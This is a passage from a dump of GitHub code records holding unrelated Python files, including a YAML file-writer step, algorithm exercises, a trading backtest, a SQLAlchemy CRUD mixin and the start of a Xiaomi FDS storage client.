context.assert_child_key_has_value('fileWriteYaml', 'path', __name__)\n\n out_path = context.get_formatted_string(context['fileWriteYaml']['path'])\n # doing it like this to safeguard against accidentally dumping all context\n # with potentially sensitive values in it to disk if payload exists but is\n # None.\n is_payload_specified = 'payload' in context['fileWriteYaml']\n\n yaml_writer = pypyr.yaml.get_yaml_parser_roundtrip_for_context()\n\n logger.debug(\"opening destination file for writing: %s\", out_path)\n os.makedirs(os.path.abspath(os.path.dirname(out_path)), exist_ok=True)\n with open(out_path, 'w') as outfile:\n if is_payload_specified:\n payload = context['fileWriteYaml']['payload']\n formatted_iterable = context.get_formatted_iterable(payload)\n else:\n formatted_iterable = context.get_formatted_iterable(context)\n\n yaml_writer.dump(formatted_iterable, outfile)\n\n logger.info(\"formatted context content and wrote to %s\", out_path)\n logger.debug(\"done\")\n","repo_name":"pombredanne/pypyr-cli","sub_path":"pypyr/steps/filewriteyaml.py","file_name":"filewriteyaml.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"32074285797","text":"from sys import stdin\r\ndef arePermutation(str1, str2):\r\n n1 = len(str1) \r\n n2 = len(str2)\r\n if (n1 != n2):\r\n return False\r\n \r\n freq = [0]*256\r\n \r\n for i in range(n1):\r\n ch = ord(str1[i])\r\n freq[ch] += 1\r\n \r\n for i in range(n2):\r\n ch = ord(str2[i])\r\n freq[ch] -= 1\r\n \r\n for i in range(256):\r\n if freq[i] != 0:\r\n return False\r\n return True\r\n \r\n \r\n \r\n \r\nstr1 = stdin.readline().strip()\r\nstr2 = stdin.readline().strip()\r\nans = arePermutation(str1, str2)\r\nif ans:\r\n print(\"true\") \r\nelse: \r\n print(\"false\") ","repo_name":"haspdecrypted/Coding-Ninjas-Intro-to-Python---DSA","sub_path":"strings/check permutation.py","file_name":"check permutation.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27314325569","text":"# Ford-Fulkerson algorith in Python\r\n\r\nfrom collections import defaultdict\r\n\r\nimport sys\r\n\r\nclass Person:\r\n \"\"\"\r\n Represent a generic person\r\n \"\"\"\r\n\r\n def __init__(self, name, priorities):\r\n \"\"\"\r\n name is a string which uniquely identifies this person\r\n\r\n priorities is a list of strings which specifies a ranking of all\r\n potential partners, from best to worst\r\n \"\"\"\r\n self.name = name\r\n self.priorities = priorities\r\n self.partner = None\r\n self.rank = None\r\n\r\n def __repr__(self):\r\n return 'Name is ' + self.name + '\\n' + \\\r\n 'Partner is currently ' + str(self.partner) + str(self.rank) + '\\n' + \\\r\n 'priority list is ' + str(self.priorities)\r\n\r\n\r\nclass Man(Person):\r\n \"\"\"\r\n Represents a man\r\n \"\"\"\r\n\r\n def __init__(self, name, priorities):\r\n \"\"\"\r\n name is a string which uniquely identifies this person\r\n\r\n priorities is a list of strings which specifies a ranking of all\r\n potential partners, from best to worst\r\n \"\"\"\r\n Person.__init__(self, name, priorities)\r\n self.proposalIndex = 0 # next person in our list to whom we might propose\r\n\r\n def nextProposal(self):\r\n if self.proposalIndex >= len(self.priorities):\r\n print ('returned None')\r\n return None\r\n goal = self.priorities[self.proposalIndex]\r\n self.proposalIndex += 1\r\n return goal\r\n\r\n def __repr__(self):\r\n return Person.__repr__(self) + '\\n' + \\\r\n 'next proposal would be to person a position ' + str(self.proposalIndex)\r\n\r\n\r\nclass Woman(Person):\r\n \"\"\"\r\n Represents a woman\r\n \"\"\"\r\n\r\n def __init__(self, name, priorities):\r\n \"\"\"\r\n name is a string which uniquely identifies this person\r\n\r\n priorities is a list of strings which specifies a ranking of all\r\n potential partners, from best to worst\r\n \"\"\"\r\n Person.__init__(self, name, priorities)\r\n\r\n # now compute a reverse lookup for efficient candidate rating\r\n self.ranking = {}\r\n for rank in range(len(priorities)):\r\n self.ranking[priorities[rank]] = rank\r\n\r\n def evaluateProposal(self, suitor):\r\n \"\"\"\r\n Evaluates a proposal, though does not enact it.\r\n\r\n suitor is the string identifier for the man who is proposing\r\n\r\n returns True if proposal should be accepted, False otherwise\r\n \"\"\"\r\n if suitor in self.ranking:\r\n if self.partner == None or self.ranking[suitor] < self.ranking[self.partner]:\r\n self.rank = self.ranking[suitor]+1\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\n\r\ndef parseFile(filename):\r\n \"\"\"\r\n Returns a list of (name,priority) pairs.\r\n \"\"\"\r\n people = []\r\n #f = file(filename)\r\n with open(filename) as f:\r\n for line in f:\r\n pieces = line.split(':')\r\n name = pieces[0].strip()\r\n if name:\r\n priorities = pieces[1].strip().split(',')\r\n for i in range(len(priorities)):\r\n priorities[i] = priorities[i].strip()\r\n people.append((name, priorities))\r\n f.close()\r\n return people\r\n\r\n\r\ndef printPairings(men,women):\r\n #print(women)\r\n for man in men.values():\r\n #print(man)\r\n print(man.name, 'is paired with', str(man.partner),end='')\r\n if man.partner:\r\n print(' rank ', man.rank, ' rank :',women[str(man.partner)].rank )\r\n else:\r\n print()\r\n\r\n\r\nclass Graph:\r\n def __init__(self, graph):\r\n self.graph = graph\r\n self. ROW = len(graph)\r\n\r\n\r\n # Using BFS as a searching algorithm\r\n def searching_algo_BFS(self, s, t, parent):\r\n\r\n visited = [False] * (self.ROW)\r\n queue = []\r\n\r\n queue.append(s)\r\n visited[s] = True\r\n\r\n while queue:\r\n\r\n u = queue.pop(0)\r\n\r\n for ind, val in enumerate(self.graph[u]):\r\n if visited[ind] == False and val > 0:\r\n queue.append(ind)\r\n visited[ind] = True\r\n parent[ind] = u\r\n\r\n return True if visited[t] else False\r\n\r\n # Applying fordfulkerson algorithm\r\n def ford_fulkerson(self, source, sink):\r\n parent = [-1] * (self.ROW)\r\n max_flow = 0\r\n\r\n while self.searching_algo_BFS(source, sink, parent):\r\n\r\n path_flow = float(\"Inf\")\r\n s = sink\r\n while(s != source):\r\n path_flow = min(path_flow, self.graph[parent[s]][s])\r\n s = parent[s]\r\n\r\n print(path_flow)\r\n print(self.graph[parent[s]])\r\n # Adding the path flows\r\n max_flow += path_flow\r\n\r\n # Updating the residual values of edges\r\n v = sink\r\n while(v != source):\r\n u = parent[v]\r\n self.graph[u][v] -= path_flow\r\n self.graph[v][u] += path_flow\r\n v = parent[v]\r\n\r\n return max_flow\r\n\r\n\r\ngraph = [[0, 8, 0, 0, 3, 0],\r\n [0, 0, 9, 0, 0, 0],\r\n [0, 0, 0, 0, 7, 2],\r\n [0, 0, 0, 0, 0, 5],\r\n [0, 0, 7, 4, 0, 0],\r\n [0, 0, 0, 0, 0, 0]]\r\n\r\ng = Graph(graph)\r\n\r\nsource = 0\r\nsink = 5\r\n\r\nprint(\"Max Flow: %d \" % g.ford_fulkerson(source, sink))\r\n\r\nif __name__ == \"__main__\":\r\n # initialize dictionary of men\r\n menlist = parseFile(sys.argv[1])\r\n men = dict()\r\n for person in menlist:\r\n men[person[0]] = Man(person[0], person[1])\r\n unwedMen = list(men.keys())\r\n\r\n # initialize dictionary of women\r\n womenlist = parseFile(sys.argv[2])\r\n women = dict()\r\n for person in womenlist:\r\n women[person[0]] = Woman(person[0], person[1])\r\n\r\n\r\n # we should be done\r\n print(\"Final Pairings are as follows:\")\r\n printPairings(men,women)","repo_name":"MaxThomas198/Multi-Agent-Systems","sub_path":"TestsForP2/testss.py","file_name":"testss.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4426089200","text":"import chatgpt_wrapper.core.util as util\nfrom chatgpt_wrapper.backends.browser.chatgpt import AsyncChatGPT\nfrom chatgpt_wrapper.core.repl import Repl\n\nclass BrowserRepl(Repl):\n \"\"\"\n A shell interpreter that serves as a front end to the ChatGPT class\n \"\"\"\n\n def configure_shell_commands(self):\n self.commands = util.introspect_commands(__class__)\n\n async def configure_backend(self):\n self.backend = AsyncChatGPT(self.config)\n\n async def launch_backend(self, interactive=True):\n await self.backend.create(timeout=90)\n\n async def do_session(self, _):\n \"\"\"\n Refresh session information\n\n This can resolve errors under certain scenarios.\n\n Examples:\n {COMMAND}\n \"\"\"\n await self.backend.refresh_session()\n usable = (\n \"The session appears to be usable.\"\n if \"accessToken\" in self.backend.session\n else \"The session is not usable. Try `install` mode.\"\n )\n util.print_markdown(f\"* Session information refreshed. {usable}\")\n\n async def cleanup(self):\n await self.backend.cleanup()\n","repo_name":"1ultimat3/chatgpt-wrapper","sub_path":"chatgpt_wrapper/backends/browser/repl.py","file_name":"repl.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"40328943535","text":"import os, sys, re\nfrom crop import crop\n\n# Create the directories in the target path to contain the cropped pages and bound pdf\ndef makeDirs(root):\n os.system(\"mkdir -p \" + os.path.join(root, \"cropped\"))\n os.system(\"mkdir -p \" + os.path.join(root, \"bound\"))\n\n# Return a list of filenames (not full pathnames) of the raw files to\n# process in the target path\ndef findImages(root):\n result = []\n valid = re.compile('^[0-9]+.[jJ][pP][eE]?[gG]$')\n all = os.listdir(root)\n for filename in all:\n path = os.path.join(root, filename)\n if (os.path.isfile(path) and\n valid.match(filename)):\n result.append(filename)\n return result\n\n# Crop each file in the target path\ndef cropAll(root):\n imageList = findImages(root)\n for image in imageList:\n imageOut = re.sub(r'(.[jJ][pP][eE]?[gG])$', '.jpg', image)\n crop(os.path.join(root, image), os.path.join(root, \"cropped\", imageOut))\n\n# Bind cropped files into a PDF\ndef bindAll(root):\n os.system(\"img2pdf -o \" + os.path.join(root, \"bound/book.pdf\") + \" \" + os.path.join(root, \"cropped/*.jpg\"))\n \ndef main():\n if len(sys.argv) != 2:\n sys.stderr.write(\"Usage: bind.py \\n\")\n exit(1)\n root = sys.argv[1]\n makeDirs(root)\n cropAll(root)\n bindAll(root)\n\nmain()\n","repo_name":"Tenrec-Builders/marker-crop","sub_path":"src/bind.py","file_name":"bind.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"26919670140","text":"import matplotlib.pyplot as plt\n# per manipolare arrays e fare di conto\nimport numpy as np\nfrom math import log10, floor, sqrt\n# per fare cose piu' sofisticate come per esempio generare \n#numeri pseudo random\nimport scipy as sp\nfrom scipy import stats\n\n\n#########################################################################\n# funzione per arrotondare con un certo numero di cifre significative\n#########################################################################\ndef round_sig(x, sig=2):\n return round(x, sig-int(floor(log10(abs(x))))-1)\n########################################################################\ndef y_inc(xl, sigma_m, sigma_c, cov_mc):\n return np.sqrt(np.power(xl, 2)*np.power(sigma_m, 2) +\n np.power(sigma_c, 2) +\n 2*xl*cov_mc) \n#########################################################################\n# funzione per fare un istogramma con una gaussiana sovrapposta\n#########################################################################\n#\ndef gaussHistogram(d, xl='x', yl='y', titolo='titolo', bin_scale=0.5):\n mean = d.mean()\n std = d.std()\n\n# scelta del binning\n binsize = std*bin_scale # metà della standard deviation di default\n interval = d.max() - d.min()\n nbins = int(interval / binsize)\n \n# 1) Crea un numpy array con 100 valori equamente separati nell'intervallo voluto dell'asse x\n lnspc = np.linspace(d.min()-std, d.max()+std, 100) \n\n# in questo modo posso raccogliere in vettori le informazioni sull'istogramma\n counts , bins , patches = plt.hist(d, bins=nbins,\n color=\"blue\", alpha=0.75)\n \n plt.xlabel(xl)\n plt.ylabel(yl)\n plt.title(label=titolo)\n# ==> Disegna una distribuzione normale\n\n# 2) Normalizza la funzione f(x) in modo che l'integrale da -inf a +inf sia il numero totale di misure\n norm_factor = d.size * binsize\n\n# 3) Crea un numpy array con i valori f(x), uno per ciascun punto\n# NOTA: Ho usato la distribuzione normale presa da \"scipy\" \n# (vedi all'inizio del programma \"from scipy import stats\")\n f_gaus = norm_factor*stats.norm.pdf(lnspc, mean, std) \n# draw the function\n plt.plot(lnspc, f_gaus, linewidth=1, color='r',linestyle='--')\n print('counts = ', len(d))\n print('mean = ', mean)\n print('sigma = ', std)\n print('sigma_mean = ', std/sqrt(len(d)))\n\n#########################################################################\n# funzione per fare il fit lineare\n#########################################################################\n#\n# funzione per valore atteso pesato per 1/$\\sigma_i^2$\ndef my_mean(x, w):\n return np.sum( x*np.power(w, -2) ) / np.sum( np.power(w, -2) )\n\ndef my_mean_sigma(w):\n return np.sqrt(1/np.sum(np.power(w,-2)))\n\ndef my_cov(x, y, w):\n return my_mean(x*y, w) - my_mean(x, w)*my_mean(y, w)\n\ndef my_var(x, w):\n return my_cov(x, x, w)\n\n# relazione lineare \ndef my_line(x, m=1, c=0):\n return x*m +c\n\n# funzione che calcola m, c, sd_m, sd_c, cov_mc a partire da\n# x, y, sd_y\ndef lin_fit(x, y, sd_y, verbose=True, plot=False):\n m = my_cov(x, y, sd_y) / my_var(x, sd_y)\n var_m = 1 / ( my_var(x, sd_y) * np.sum( np.power(sd_y, -2)) )\n c = np.mean(y) - np.mean(x) * m\n var_c = my_mean(x*x, sd_y) / ( my_var(x, sd_y) * np.sum( np.power(sd_y, -2)))\n cov_mc = - my_mean(x, sd_y) / ( my_var(x, sd_y) * np.sum( np.power(sd_y, -2))) \n if (verbose):\n print ('m = ', m)\n print ('sigma(m) = ', np.sqrt(var_m))\n print ('c = ', c)\n print ('sigma(c) = ', np.sqrt(var_c))\n print ('cov(m, c) = ', cov_mc)\n \n if (plot):\n # rappresento i punti misurati\n plt.errorbar(x, y, yerr=sd_y, xerr=0, ls='', marker='.', \n label='punti misurati')\n\n # costruisco dei punti x su cui valutare la retta di regressione\n xmin = np.min(x)\n xmax = np.max(x)\n xl = np.linspace(0.8*xmin-.2*(xmax-xmin), xmax*1.2+.2*(xmax-xmin), 100)\n # uso i parametri medi di m e c\n yl = my_line(xl, m, c)\n # rappresento la retta di regressione\n plt.plot(xl, yl, 'g-.', label='retta di regressione')\n plt.xlabel('$x$')\n plt.ylabel('$y$')\n plt.title('Regressione lineare')\n a=plt.legend()\n return m, np.sqrt(var_m), c, np.sqrt(var_c), cov_mc\n \n#Grafico Fit\ndef fit_graph(x,y,sy,m,sm,c,sc,co, grid=True, err=True):\n xmin = np.amin(x)\n xmax = np.amax(x)\n # rappresento i punti misurati\n plt.errorbar(x, y, yerr=sy, xerr=0, ls='', marker='.', label='punti misurati')\n\n # costruisco dei punti x su cui valutare la retta di regressione\n xl = np.linspace(xmin, xmax, 100)\n # uso i parametri medi di m e c\n yl = my_line(xl, m,c)\n # rappresento la retta di regressione\n plt.plot(xl, yl, 'g-.', label='retta di regressione')# propagazione incertezza su y a partire da m e c\n # incertezza sulle y\n yinc = y_inc(xl, sm, sc, co)\n if (err): \n # curve a y +- incertezza\n plt.plot(xl, yl+yinc, 'r--', label='banda incertezza $\\pm \\sigma_{m}$')\n plt.plot(xl, yl-yinc, 'r--') \n if (grid):\n plt.grid(b=None, which='major', axis='both')\n plt.legend()\n","repo_name":"Kevin222-hub/Lab_reports","sub_path":"Elettro_1/my_lib.py","file_name":"my_lib.py","file_ext":"py","file_size_in_byte":5218,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34757762547","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Optional, Any, Iterable\n\nfrom sqlalchemy import exists\nfrom sqlalchemy.exc import NoResultFound\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom .inspection import InspectionMixin\nfrom .utils import classproperty\n\nif TYPE_CHECKING:\n from db.model import Model\n\n\nclass CRUDMixin(InspectionMixin):\n __abstract__ = True\n\n @classproperty\n def settable_attributes(cls) -> list[str]:\n return cls.columns + cls.hybrid_properties + cls.settable_relations\n\n def fill(self, **fields: str) -> Model:\n for name in fields.keys():\n if name in self.settable_attributes:\n setattr(self, name, fields[name])\n else:\n raise KeyError(\"Attribute '{}' doesn't exist\".format(name))\n\n return self\n\n async def save(\n self,\n session: AsyncSession,\n flush: bool = True,\n refresh: bool = False\n ) -> Model:\n session.add(self)\n if flush:\n await session.flush()\n if refresh:\n await session.refresh(self)\n return self\n\n @classmethod\n async def create(\n cls,\n session: AsyncSession,\n **fields: str\n ) -> Model:\n return await cls().fill(**fields).save(session)\n\n @classmethod\n async def bulk_create(\n cls,\n session: AsyncSession,\n objects: Iterable[Model]\n ):\n \"\"\"Add and create the given collection of instances.\"\"\"\n session.add_all(objects)\n await session.flush()\n\n\n async def update(\n self,\n session: AsyncSession,\n **fields: str\n ) -> Model:\n self.fill(**fields)\n return await self.save(session)\n\n @classmethod\n async def get_or_create(\n cls,\n session: Optional[AsyncSession] = None,\n defaults: Optional[dict] = None,\n **kwargs: Any,\n ) -> tuple[Model, bool]:\n \"\"\"\n Fetches the object if exists (filtering on the provided parameters),\n else creates an instance with any unspecified parameters as default values.\n \"\"\"\n if defaults is None:\n defaults = {}\n try:\n instance = await cls.where(**kwargs).one(session)\n return instance, False\n except NoResultFound:\n kwargs |= defaults or {}\n return await cls.create(session, **kwargs), True\n\n @classmethod\n async def update_or_create(\n cls,\n session: Optional[AsyncSession] = None,\n defaults: Optional[dict] = None,\n **kwargs: Any,\n ) -> tuple[Model, bool]:\n \"\"\"\n A convenience method for updating an object with the given\n kwargs, creating a new one if necessary.\n \"\"\"\n if defaults is None:\n defaults = {}\n try:\n instance = await cls.where(**kwargs).one(session)\n except NoResultFound:\n kwargs |= defaults or {}\n return await cls.create(session, **kwargs), True\n else:\n await instance.update(session, **defaults)\n return instance, False\n\n @classmethod\n async def find(\n cls,\n session: Optional[AsyncSession],\n id: int,\n ) -> Model:\n \"\"\"\n Find record by id.\n\n Args:\n id_ (int): Primary key\n\n Raises: NoResultFound\n \"\"\"\n instance = await session.get(cls, id)\n if not instance:\n raise NoResultFound\n return instance\n\n @classmethod\n async def find_or_none(\n cls,\n session: Optional[AsyncSession],\n id: int,\n ) -> Model:\n \"\"\"\n Find record by id.\n\n Args:\n id_ (int): Primary key\n \"\"\"\n return await session.get(cls, id)\n\n @classmethod\n async def exists(\n cls,\n session: AsyncSession,\n **fields: str\n ) -> bool:\n \"\"\"\n Syntactic sugar for exists.\n\n Can be used as an alternative of following:\n\n is_exist = await exists(\n select(Account).filter_by(**fields)\n ).select().scalar(db)\n\n Example:\n\n is_exist = await Account \\\n .exists(db, email=\"jondoe@gmail.com\")\n\n \"\"\"\n return await exists(cls.where(**fields)).select().scalar(session)\n","repo_name":"mkbeh/fastapi-admin-panel","sub_path":"backend/app/db/mixins/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"37123832900","text":"import pandas as pd\n\nimport ezyquant as ez\nfrom ezyquant import utils as ezutils\nfrom ezyquant.backtesting import Context\nfrom ezyquant.reader import SETBusinessDay\n\nnan = float(\"nan\")\n\n# Connect Database\nez.connect_sqlite(\"ezyquant.db\")\n\n# Prepare Data\nstart_date = \"2020-01-01\"\nstart_load_date = ezutils.date_to_str(\n pd.Timestamp(start_date) - SETBusinessDay(14)\n) # load more data for signal calculation\nend_date = \"2022-12-31\"\nssc = ez.SETSignalCreator(\n start_date=start_date,\n index_list=[\"SET50\"],\n)\n\n# Generate Signal\ndf_high = ssc.get_data(\"high\", \"daily\")\ndf_low = ssc.get_data(\"low\", \"daily\")\ndf_close = ssc.get_data(\"close\", \"daily\")\n\nsignal_df = ssc.ta.rsi_divergence(high=df_high, low=df_low, close=df_close)\n\n\n# Backtest Algorithm\ndef backtest_algorithm(c: Context):\n # Buy signal\n if c.signal > 0:\n return c.target_pct_port(0.1)\n # Take profit\n if 1.1 * c.cost_price < c.close_price:\n return c.target_pct_port(0)\n # Stop loss\n if c.close_price < 0.95 * c.cost_price:\n return c.target_pct_port(0)\n\n return 0\n\n\n# Backtest\nresult = ez.backtest(\n signal_df=signal_df,\n backtest_algorithm=backtest_algorithm,\n start_date=start_date,\n end_date=end_date,\n initial_cash=1e6,\n pct_commission=0.25,\n pct_buy_slip=0.0,\n pct_sell_slip=0.0,\n price_match_mode=\"weighted\",\n signal_delay_bar=1,\n)\n\n# Show Result\nprint(result.stat_df)\n","repo_name":"ezyquant/ezyquant","sub_path":"examples/model_rsi_divergence.py","file_name":"model_rsi_divergence.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"22168643248","text":"import sys\r\n\r\nclass UFDS:\r\n def __init__(self, N):\r\n self.p = [i for i in range(N)]\r\n self.rank = [0 for _ in range(N)]\r\n self.size = [1 for _ in range(N)]\r\n\r\n def find_set(self, i):\r\n if self.p[i] == i: return i\r\n self.p[i] = self.find_set(self.p[i])\r\n return self.p[i]\r\n\r\n def union(self, i, j):\r\n x, y = self.find_set(i), self.find_set(j)\r\n if x != y:\r\n if self.rank[x] > self.rank[y]:\r\n self.p[y] = x\r\n self.size[x] += self.size[y]\r\n else:\r\n self.p[x] = y\r\n self.size[y] += self.size[x]\r\n if self.rank[x] == self.rank[y]:\r\n self.rank[y] += 1\r\n\r\nn, q = map(int, input().split())\r\nufds = UFDS(n)\r\nfor line in sys.stdin:\r\n c = line.split()\r\n if len(c) == 2:\r\n print(ufds.size[ufds.find_set(int(c[-1]) - 1)])\r\n else:\r\n ufds.union(int(c[1]) - 1, int(c[2]) - 1)","repo_name":"RussellDash332/kattis","sub_path":"src/Tildes/tildes.py","file_name":"tildes.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"41189740910","text":"from javascript import require\n\n\nclass Flatline:\n \"\"\"A bridge to an underlying nodejs Flatline interpreter.\n\n This class uses JSPyBridge to launch a Nodejs interpreter that loads\n Flatline's javascript implementation and allows interaction via\n Python constructs.\n\n Example:\n\n Flatline.check_lisp('(+ 1 2)')\n Flatline.check_json([\"f\", 0], dataset=dataset)\n\n \"\"\"\n\n __FLATLINEJS = require('./flatline/flatline-node.js')\n interpreter = __FLATLINEJS.bigml.dixie.flatline\n\n #pylint: disable=locally-disabled,invalid-name\n @staticmethod\n def infer_fields(row, prefix=None, offset=None):\n \"\"\"Utility function generating a mock list of fields.\n\n Usually, checks and applications of Flatline expressions run\n in the context of a given dataset's field descriptors, but\n during testing it's useful sometimes to provide a mock set of\n them, based on the types of the values of the test input rows.\n\n Example:\n\n In[1]: Interpreter.infer_fields([0, 'a label'])\n Out[2]: [{'column_number': 0,\n 'datatype': 'int64',\n 'id': '000000',\n 'optype': 'numeric'},\n {'column_number': 1,\n 'datatype': 'string',\n 'id': '000001',\n 'optype': 'categorical'}]\n\n \"\"\"\n result = []\n id_ = 0\n for v in row:\n t = type(v)\n optype = 'categorical'\n datatype = 'string'\n if (t is int or t is float):\n optype = 'numeric'\n if t is float:\n datatype = 'float64'\n else:\n datatype = 'int64'\n id_str = '%06x' % id_\n if prefix:\n length = len(prefix)\n id_str = prefix + id_str[length:]\n column = id_\n if offset:\n column = offset + id_\n result.append({'id': id_str,\n 'optype':optype,\n 'datatype': datatype,\n 'column_number': column})\n id_ = id_ + 1\n return result\n\n @staticmethod\n def _dataset(dataset, rows):\n \"\"\"The dataset argument should be a Dataset that contains the\n in_fields information\n \"\"\"\n try:\n return {\"fields\": dataset.in_fields}\n except AttributeError:\n if len(rows) > 0:\n return {'fields': Flatline.infer_fields(rows[0])}\n return None\n\n @staticmethod\n def defined_functions():\n \"\"\"A list of the names of all defined Flaline functions\"\"\"\n return Flatline.interpreter.defined_primitives\n\n @staticmethod\n def check_lisp(sexp, fields=None):\n \"\"\"Checks whether the given lisp s-expression is valid.\n\n Any operations referring to a dataset's fields will use the\n information found in fields structure.\n\n \"\"\"\n r = Flatline.interpreter.evaluate_sexp(sexp, fields, True).valueOf()\n return r\n\n @staticmethod\n def check_json(json_sexp, fields=None):\n \"\"\"Checks whether the given JSON s-expression is valid.\n\n Works like `check_lisp` (which see), but taking a JSON\n expression represented as a native Python list instead of a\n Lisp sexp string.\n\n \"\"\"\n r = Flatline.interpreter.evaluate_js(json_sexp, fields).valueOf()\n return r\n\n @staticmethod\n def lisp_to_json(sexp):\n \"\"\" Auxliary function transforming Lisp to Python representation.\"\"\"\n return Flatline.interpreter.sexp_to_js(sexp)\n\n @staticmethod\n def json_to_lisp(json_sexp):\n \"\"\" Auxliary function transforming Python to lisp representation.\"\"\"\n return Flatline.interpreter.js_to_sexp(json_sexp)\n\n @staticmethod\n def apply_lisp(sexp, rows, dataset=None):\n \"\"\"Applies the given Lisp sexp to a set of input rows.\n\n Input rows are represented as a list of lists of native Python\n values. The dataset info should be provided as a Dataset object.\n If no dataset is provided, the field characteristics\n of the input rows are guessed using `infer_fields`.\n\n \"\"\"\n return Flatline.interpreter.eval_and_apply_sexp(\n sexp,\n Flatline._dataset(dataset, rows),\n rows)\n\n @staticmethod\n def apply_json(json_sexp, rows, dataset=None):\n \"\"\"Applies the given JSON sexp to a set of input rows.\n\n As usual, JSON sexps are represented as Python lists,\n e.g. [\"+\", 1, 2].\n\n Input rows are represented as a list of lists of native Python\n values. The dataset info should be provided as a Dataset object.\n If no dataset is provided, the field characteristics\n of the input rows are guessed using `infer_fields`.\n\n \"\"\"\n return Flatline.interpreter.eval_and_apply_js(\n json_sexp,\n Flatline._dataset(dataset, rows),\n rows)\n","repo_name":"bigmlcom/python","sub_path":"bigml/flatline.py","file_name":"flatline.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"40"} +{"seq_id":"30340831122","text":"import json\nimport hashlib\nfrom urllib.parse import quote\n\nimport requests\n\nfrom .auth.common import Common\nfrom .auth.signature.signer import Signer\nfrom .fds_client_configuration import FDSClientConfiguration\nfrom .fds_request import FDSRequest\nfrom .galaxy_fds_client_exception import GalaxyFDSClientException\nfrom .model.access_control_policy import AccessControlPolicy\nfrom .model.fds_bucket import FDSBucket\nfrom .model.fds_object import FDSObject\nfrom .model.fds_object_listing import FDSObjectListing\nfrom .model.fds_object_metadata import FDSObjectMetadata\nfrom .model.fds_object_summary import FDSObjectSummary\nfrom .model.permission import AccessControlList, UserGroups, Permission, \\\n GrantType\nfrom .model.permission import Grant\nfrom .model.permission import Grantee\nfrom .model.permission import Owner\nfrom .model.put_object_result import PutObjectResult\nfrom .model.subresource import SubResource\nfrom .model.init_multipart_upload_result import InitMultipartUploadResult\nfrom .model.upload_part_result import UploadPartResult\nimport os\nimport sys\nfrom . import utils\n\nclass GalaxyFDSClient(object):\n '''\n Client for Galaxy FDS Service.\n '''\n\n def __init__(self, access_key=None, access_secret=None, config=None):\n '''\n :param access_key: The app access key\n :param access_secret: The app access secret\n :param config: The FDS service's config\n '''\n self._delimiter = \"/\"\n\n if access_key == None or access_secret == None:\n # Get keys from environment variables\n if \"XIAOMI_ACCESS_KEY\" in os.environ and \"XIAOMI_SECRET_KEY\" in os.environ:\n self._access_key = os.environ[\"XIAOMI_ACCESS_KEY\"]\n self._secret_key = os.environ[\"XIAOMI_SECRET_KEY\"]\n else:\n # Read keys from configuration file\n config_filename = os.path.join(\n os.path.expanduser('~'), \".config/xiaomi/config\")\n if os.path.exists(config_filename):\n with open(config_filename) as f:\n data = json.load(f)\n self._access_key = data[\"access_key\"]\n self._secret_key = data[\"secret_key\"]\n else:\n self._access_key = access_key\n self._secret_key = access_secret\n\n self._auth = Signer(self._access_key, self._secret_key)\n if config == None:\n config = FDSClientConfiguration()\n if \"FDS_ENDPOINT\" in os.environ:\n config.set_endpoint(os.environ[\"FDS_ENDPOINT\"])\n self._config = config\n self._request = FDSRequest(config.timeout, config.max_retries)\n\n @property\n def delimiter(self):\n return self._delimiter\n\n @delimiter.setter\n def delimiter(self, delimiter):\n self._delimiter = delimiter\n\n def does_bucket_exist(self, bucket_name):\n '''\n Check the existence of a specified bucket.\n :param bucket_name: The bucket name of the bucket to check\n :return: True if the bucket exists, otherwise False\n '''\n uri = '%s%s' % (self._config.get_base_uri(), bucket_name)\n response = self._request.head(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n return True\n elif response.status_code == requests.codes.not_found:\n return False\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Check bucket existence failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def list_buckets(self):\n '''\n List all the buckets of the current developer.\n :return: A list of FDSBucket which contains name and owner of the bucket.\n '''\n uri = self._config.get_base_uri()\n response = self._request.get(uri, auth=self._auth)\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'List buckets failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n elif response.content:\n buckets_list = []\n json_response = json.loads(response.content.decode('utf-8'))\n buckets = json_response['buckets']\n owner = Owner().from_json(json_response['owner'])\n for bucket in buckets:\n buckets_list.append(FDSBucket(bucket['name'], owner))\n return buckets_list\n else:\n return list()\n\n def create_bucket(self, bucket_name):\n '''\n Create a bucket with the specified name.\n :param bucket_name: The name of the bucket to create\n '''\n uri = '%s%s' % (self._config.get_base_uri(), bucket_name)\n response = self._request.put(uri, auth=self._auth)\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Create bucket failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def delete_bucket(self, bucket_name):\n '''\n Delete a bucket of a specified name.\n :param bucket_name: The name of the bucket to delete\n '''\n uri = '%s%s' % (self._config.get_base_uri(), 